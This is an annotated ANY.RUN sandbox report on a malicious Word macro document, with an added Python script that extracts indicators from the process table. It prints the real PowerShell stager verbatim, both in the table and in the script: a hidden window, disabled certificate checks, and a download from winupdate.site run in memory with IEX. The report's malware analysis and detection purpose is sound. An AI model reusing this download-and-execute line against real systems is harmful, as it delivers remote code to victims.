File name: ce0d8f9a7cc76e9a6137f782a6733ec6a041df91ddda3a9b3cdda65a61b73a4e

Full analysis: https://app.any.run/tasks/5ad01e5c-f641-4c42-b40d-c2cc35bd62df
Verdict: Malicious activity
Analysis date: October 14, 2019, 01:41:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 936, Author: Win10vul2, Template: Normal, Last Saved By: Administrator, Revision Number: 102, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:49:00, Create Time/Date: Tue Sep 17 04:06:00 2019, Last Saved Time/Date: Sat Oct 12 12:36:00 2019, Number of Pages: 3, Number of Words: 150, Number of Characters: 856, Security: 0
MD5: 90B33C691919B65559C1D8B534DA73FF
SHA1: CF47BD562EDB68262F6F2C7A7131A2828112401C
SHA256: CE0D8F9A7CC76E9A6137F782A6733EC6A041DF91DDDA3A9B3CDDA65A61B73A4E
SSDEEP: 384:pBEG68VWiRx1miSgq03gsJi5fNMt4Y8LQejJJAwbEDoIyMwtw7ev50EcA0j2CsEH:pBZVZRx1A03gjZdnn0Q1A

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • mmc.exe (PID: 2424)
    • Starts Visual C# compiler

      • powershell.exe (PID: 1952)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1952)
    • PowerShell script executed

      • powershell.exe (PID: 1952)
    • Creates files in the user directory

      • powershell.exe (PID: 1952)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 1952)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1952)
    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 2580)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2720)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2720)
    • Manual execution by user

      • CompMgmtLauncher.exe (PID: 2440)
      • CompMgmtLauncher.exe (PID: 3352)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Win10vul2
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Administrator
RevisionNumber: 102
Software: Microsoft Office Word
TotalEditTime: 1.8 hours
CreateDate: 2019:09:17 03:06:00
ModifyDate: 2019:10:12 11:36:00
Pages: 3
Words: 150
Characters: 856
Security: None
CodePage: Windows Simplified Chinese (PRC, Singapore)
Company: -
Lines: 7
Paragraphs: 2
CharCountWithSpaces: 1004
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
CompObjUserTypeLen: 28
CompObjUserType: Microsoft Word 97-2003 文档 (code page 936; the two GBK characters mean "document" and account for the recorded length of 28)
Processes: total 52; monitored 10; malicious 1; suspicious 0

Behavior graph

Process tree, reconstructed from the parent-process column of the table below (PIDs in parentheses):

explorer.exe
├─ WINWORD.EXE (2720)                    opens the document; the macro runs on open (tag: macros-on-open)
├─ CompMgmtLauncher.exe (3352, MEDIUM)   manual execution by user; exits 0xC000042C STATUS_ELEVATION_REQUIRED
└─ CompMgmtLauncher.exe (2440, HIGH)     manual execution by user; relaunched elevated after the UAC prompt
   └─ mmc.exe (2424, HIGH)               compmgmt.msc; the process that loads the Task Scheduler COM API
wmiprvse.exe
└─ powershell.exe (1952)                 -nop -w hidden; downloads https://winupdate.site:443/updates and runs it with IEX
   ├─ csc.exe (1764)                     compiles C# from %TEMP%\rpngq5pa.cmdline
   │  └─ cvtres.exe (388)                resource-to-COFF step of that build
   ├─ cmd.exe (2580) /C ipconfig
   │  └─ ipconfig.exe (1704)
   └─ cmd.exe (2864) /C whoa,i           exit code 1

Two things to read off the tree before scoring. First, the sample's PowerShell is a child of wmiprvse.exe, not of WINWORD.EXE: the macro evidently launched it through WMI, which is what the "Executed via WMI" signature records. A detection keyed only on Office spawning PowerShell never sees this chain; also key on the WMI provider host spawning a hidden-window PowerShell. Second, the CompMgmtLauncher.exe / mmc.exe branch is the analyst's own interaction ("Manual execution by user" under INFO), so the MALICIOUS "Loads the Task Scheduler COM API" hit belongs to the sandbox user, not to the sample, and should be discounted when judging the document.

Process information

PID 2720  WINWORD.EXE  parent: explorer.exe  user: admin  integrity: MEDIUM
  Path:    C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Command: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ce0d8f9a7cc76e9a6137f782a6733ec6a041df91ddda3a9b3cdda65a61b73a4e.doc"
  Microsoft Word, Microsoft Corporation, version 14.0.6024.1000

PID 1952  powershell.exe  parent: wmiprvse.exe  user: admin  integrity: MEDIUM
  Path:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command: powershell.exe -nop -w hidden -c " [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $wc = New-Object System.Net.WebClient; $wc.Headers.set('user-Agent','Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'); $jpg = $wc.downloadstring('https://winupdate.site:443/updates'); IEX $jpg; "
  Windows PowerShell, Microsoft Corporation, version 6.1.7600.16385 (win7_rtm.090713-1255)
  Note: this is the stager. -nop skips profile scripts, -w hidden hides the console, the ServerCertificateValidationCallback assignment makes the client accept any certificate winupdate.site presents, a spoofed User-Agent is set, and the response body is handed straight to IEX, so the second stage runs in memory without being written to disk.

PID 1764  csc.exe  parent: powershell.exe  user: admin  integrity: MEDIUM  exit code: 0
  Path:    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
  Command: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\rpngq5pa.cmdline"
  Visual C# Command Line Compiler, Microsoft Corporation, version 8.0.50727.4927 (NetFXspW7.050727-4900)
  Note: a csc.exe child of PowerShell driven by a random-named .cmdline response file in %TEMP% is the pattern Add-Type produces when a script compiles inline C#; the resulting rpngq5pa.dll appears under dropped files. The downloaded stage therefore carried C# source, not just PowerShell.

PID 388  cvtres.exe  parent: csc.exe  user: admin  integrity: MEDIUM  exit code: 0
  Path:    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESC3E8.tmp" "c:\Users\admin\AppData\Local\Temp\CSCC3E7.tmp"
  Microsoft® Resource File To COFF Object Conversion Utility, Microsoft Corporation, version 8.00.50727.4940 (Win7SP1.050727-5400)

PID 3352  CompMgmtLauncher.exe  parent: explorer.exe  user: admin  integrity: MEDIUM  exit code: 3221226540
  Path:    C:\Windows\system32\CompMgmtLauncher.exe
  Command: "C:\Windows\system32\CompMgmtLauncher.exe"
  Computer Management Snapin Launcher, Microsoft Corporation, version 6.1.7600.16385 (win7_rtm.090713-1255)
  Note: 3221226540 is 0xC000042C, STATUS_ELEVATION_REQUIRED: the medium-integrity launch could not open the console and triggered a UAC prompt.

PID 2440  CompMgmtLauncher.exe  parent: explorer.exe  user: admin  integrity: HIGH  exit code: 0
  Path:    C:\Windows\system32\CompMgmtLauncher.exe
  Command: "C:\Windows\system32\CompMgmtLauncher.exe"
  Computer Management Snapin Launcher, Microsoft Corporation, version 6.1.7600.16385 (win7_rtm.090713-1255)
  Note: the elevated relaunch after the prompt was accepted; both launches are tagged "Manual execution by user", i.e. the analyst, not the sample.

PID 2424  mmc.exe  parent: CompMgmtLauncher.exe  user: admin  integrity: HIGH
  Path:    C:\Windows\system32\mmc.exe
  Command: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc" /s
  Microsoft Management Console, Microsoft Corporation, version 6.1.7600.16385 (win7_rtm.090713-1255)
  Note: Computer Management bundles the Task Scheduler snap-in, which is why this process carries the "Loads the Task Scheduler COM API" signature.

PID 2580  cmd.exe  parent: powershell.exe  user: admin  integrity: MEDIUM  exit code: 0
  Path:    C:\Windows\system32\cmd.exe
  Command: C:\Windows\system32\cmd.exe /C ipconfig
  Windows Command Processor, Microsoft Corporation, version 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 1704  ipconfig.exe  parent: cmd.exe  user: admin  integrity: MEDIUM  exit code: 0
  Path:    C:\Windows\system32\ipconfig.exe
  Command: ipconfig
  IP Configuration Utility, Microsoft Corporation, version 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2864  cmd.exe  parent: powershell.exe  user: admin  integrity: MEDIUM  exit code: 1
  Path:    C:\Windows\system32\cmd.exe
  Command: C:\Windows\system32\cmd.exe /C whoa,i
  Windows Command Processor, Microsoft Corporation, version 6.1.7601.17514 (win7sp1_rtm.101119-1850)
  Note: the command line is reproduced exactly as recorded; cmd.exe returned 1, consistent with an unrecognised command, so the two cmd.exe children are host reconnaissance issued by the second stage, one of which failed.
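As an added example (not code from ANY.RUN or from the report), the following Python turns the process table above into the checks an analyst would actually run on it: it pulls the stager's traits and IOCs out of the PowerShell command line, decodes the unsigned exit code of PID 3352 as an NTSTATUS, pairs it with the HIGH-integrity relaunch of the same image from the same parent, and marks the processes under that manual branch so their signatures can be discounted. The EVENTS list is constructed from this page's table (command lines other than the stager's are abbreviated); the STATUS_NAMES map and every function name are the example's own.

```python
"""Triage helpers for a sandbox process table (added example, not ANY.RUN's code).

EVENTS is constructed from the process table on this page: pid, image, parent
image, integrity level, command line and, where the report records one, the
exit code (kept, as in the report, as an unsigned decimal).
"""
import re
from dataclasses import dataclass
from typing import Optional

# Assumption: the only NTSTATUS worth naming here is the one the report shows.
STATUS_ELEVATION_REQUIRED = 0xC000042C
STATUS_NAMES = {STATUS_ELEVATION_REQUIRED: "STATUS_ELEVATION_REQUIRED"}


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent: str
    integrity: str
    cmdline: str
    exit_code: Optional[int] = None


# The stager command line exactly as the report records it.
STAGER_CMD = (
    'powershell.exe -nop -w hidden -c " [System.Net.ServicePointManager]::'
    "ServerCertificateValidationCallback = { $true }; $wc = New-Object System.Net.WebClient; "
    "$wc.Headers.set('user-Agent','Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'); "
    "$jpg = $wc.downloadstring('https://winupdate.site:443/updates'); IEX $jpg; \""
)

# Constructed from the page's table; non-stager command lines abbreviated.
EVENTS = [
    ProcEvent(2720, "WINWORD.EXE", "explorer.exe", "MEDIUM", "WINWORD.EXE /n <sample>.doc"),
    ProcEvent(1952, "powershell.exe", "wmiprvse.exe", "MEDIUM", STAGER_CMD),
    ProcEvent(1764, "csc.exe", "powershell.exe", "MEDIUM",
              r"csc.exe /noconfig /fullpaths @C:\Users\admin\AppData\Local\Temp\rpngq5pa.cmdline", 0),
    ProcEvent(388, "cvtres.exe", "csc.exe", "MEDIUM", "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86", 0),
    ProcEvent(3352, "CompMgmtLauncher.exe", "explorer.exe", "MEDIUM", "CompMgmtLauncher.exe", 3221226540),
    ProcEvent(2440, "CompMgmtLauncher.exe", "explorer.exe", "HIGH", "CompMgmtLauncher.exe", 0),
    ProcEvent(2424, "mmc.exe", "CompMgmtLauncher.exe", "HIGH", r"mmc.exe C:\Windows\system32\compmgmt.msc /s"),
    ProcEvent(2580, "cmd.exe", "powershell.exe", "MEDIUM", "cmd.exe /C ipconfig", 0),
    ProcEvent(1704, "ipconfig.exe", "cmd.exe", "MEDIUM", "ipconfig", 0),
    ProcEvent(2864, "cmd.exe", "powershell.exe", "MEDIUM", "cmd.exe /C whoa,i", 1),
]


def by_pid(pid, events=EVENTS):
    return next(e for e in events if e.pid == pid)


def stager_indicators(ev):
    """Downloader-stager traits and IOCs visible in a PowerShell launch."""
    if ev.image.lower() != "powershell.exe":
        return {}
    cl, hits = ev.cmdline, {}
    # Office -> WMI -> PowerShell: the parent is the WMI provider host, not WINWORD.EXE.
    if ev.parent.lower() == "wmiprvse.exe":
        hits["wmi_parent"] = True
    if re.search(r"-w(?:indowstyle)?\s+hidden", cl, re.I):
        hits["hidden_window"] = True
    if re.search(r"-nop(?:rofile)?\b", cl, re.I):
        hits["no_profile"] = True
    if "ServerCertificateValidationCallback" in cl:   # accepts any TLS certificate
        hits["tls_validation_disabled"] = True
    if re.search(r"\bIEX\b|Invoke-Expression", cl, re.I):
        hits["invoke_expression"] = True
    m = re.search(r"downloadstring\(\s*'([^']+)'\s*\)", cl, re.I)
    if m:
        hits["download_url"] = m.group(1)
    m = re.search(r"'user-agent'\s*,\s*'([^']+)'", cl, re.I)
    if m:
        hits["user_agent"] = m.group(1)
    return hits


def score(hits):
    """Number of behavioural traits; the URL and User-Agent are evidence, not points."""
    return sum(1 for k in hits if k not in ("download_url", "user_agent"))


def decode_exit_code(code):
    """Reports print exit codes unsigned; anything >= 0xC0000000 is an NTSTATUS error."""
    if code is None:
        return "not recorded"
    if code >= 0xC0000000:
        return f"NTSTATUS 0x{code:08X} {STATUS_NAMES.get(code, '(unnamed)')}"
    return f"exit {code}"


def find_uac_elevations(events):
    """Pair a MEDIUM launch that died with STATUS_ELEVATION_REQUIRED with the HIGH
    relaunch of the same image from the same parent: a UAC prompt the user accepted."""
    pairs = []
    for lo in events:
        if lo.integrity != "MEDIUM" or lo.exit_code != STATUS_ELEVATION_REQUIRED:
            continue
        for hi in events:
            if hi.pid != lo.pid and (hi.image, hi.parent, hi.integrity) == (lo.image, lo.parent, "HIGH"):
                pairs.append((lo.pid, hi.pid))
    return pairs


def manual_branch(events):
    """PIDs spawned by a manually elevated launcher: their signatures describe the analyst, not the sample."""
    elevated = {hi for _, hi in find_uac_elevations(events)}
    launchers = {e.image for e in events if e.pid in elevated}
    return {e.pid for e in events if e.parent in launchers}


if __name__ == "__main__":
    hits = stager_indicators(by_pid(1952))
    print("stager:", hits, "score", score(hits))
    for e in EVENTS:
        print(e.pid, e.image, decode_exit_code(e.exit_code))
    print("UAC elevations:", find_uac_elevations(EVENTS), "manual branch:", manual_branch(EVENTS))
```

The parent check is deliberately the WMI provider host rather than WINWORD.EXE, because that is the chain this report shows; a rule that only pairs Office with PowerShell would have scored nothing here.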
Events: total 2 632; read 1 228; write 0; delete 0

Modification events

No data

Files written: executable 0; suspicious 2; text 4; unknown types 4

Dropped files

PID   Process         Filename
2720  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\CVRA766.tmp.cvr  (hashes not recorded)
2720  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\~DFAA40B4773D8D43A7.TMP  (hashes not recorded)
2720  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\~DF480ACE5A8E0FA3E3.TMP  (hashes not recorded)
1952  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GUQXK2PQPL2RDJVFQB0C.temp  (hashes not recorded)
1764  csc.exe         C:\Users\admin\AppData\Local\Temp\CSCC3E7.tmp  (hashes not recorded)
388   cvtres.exe      C:\Users\admin\AppData\Local\Temp\RESC3E8.tmp  (hashes not recorded)
1764  csc.exe         C:\Users\admin\AppData\Local\Temp\rpngq5pa.dll  (hashes not recorded)
1764  csc.exe         C:\Users\admin\AppData\Local\Temp\rpngq5pa.out  (hashes not recorded)
2720  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm  type: pgc
      MD5 45822EE62FC571A3151895E367644231
      SHA256 EB3C643FA978D554A4FC475FB2EC2D439467CBEED53546B5218462C2B3EC2CB5
1952  powershell.exe  C:\Users\admin\AppData\Local\Temp\rpngq5pa.cmdline  type: text
      MD5 925A417AD5F74BE86C8D44DC4E6CB78E
      SHA256 BCC7927D914B0E377FF79BA775B840FE643C022D063DC909FF59FC774B800743

rpngq5pa.dll is the assembly csc.exe built from the downloaded stage and rpngq5pa.cmdline is the compiler response file PowerShell wrote for it; the report records no hash for the DLL, so the compiled payload cannot be pivoted on from this summary alone.
Network summary: HTTP(S) requests 0; TCP/UDP connections 28; DNS requests 1; threats 0

HTTP requests

No HTTP requests recorded. The stager fetches https://winupdate.site:443/updates over TLS with certificate validation disabled, so neither the request nor the returned script is visible in this report; only the TCP connection and the DNS lookup below are.

Connections

PID   Process         Remote              Domain          ASN                   CN  Reputation
1952  powershell.exe  154.223.180.21:443  winupdate.site  MULTACOM CORPORATION  US  unknown

DNS requests

Domain          IP              Reputation
winupdate.site  154.223.180.21  suspicious

Threats

No threats detected
Debug output

Process  Message                                                                                                              Count
csc.exe  *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144   6
csc.exe  *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302               4

-2147024774 is 0x8007007A, HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER), raised in the side-by-side isolation code during the compiler's own start-up. It is the compiler's debug chatter, not output from the compiled payload and not an error caused by the sample, so it carries no weight in the verdict.